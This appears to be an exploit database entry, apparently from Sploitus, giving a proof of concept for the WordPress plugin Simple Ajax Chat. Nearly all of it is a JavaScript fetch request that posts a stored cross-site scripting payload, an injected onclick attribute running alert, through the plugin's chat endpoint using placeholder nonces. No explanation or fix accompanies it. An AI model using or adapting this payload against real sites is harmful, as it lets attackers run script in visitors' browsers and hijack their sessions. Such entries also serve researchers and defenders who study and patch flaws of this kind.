Share
## https://sploitus.com/exploit?id=WPEX-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB
await fetch("http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0",
"Accept": "*/*",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Sec-GPC": "1"
},
"body": "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE",
"method": "POST",
"mode": "cors"
});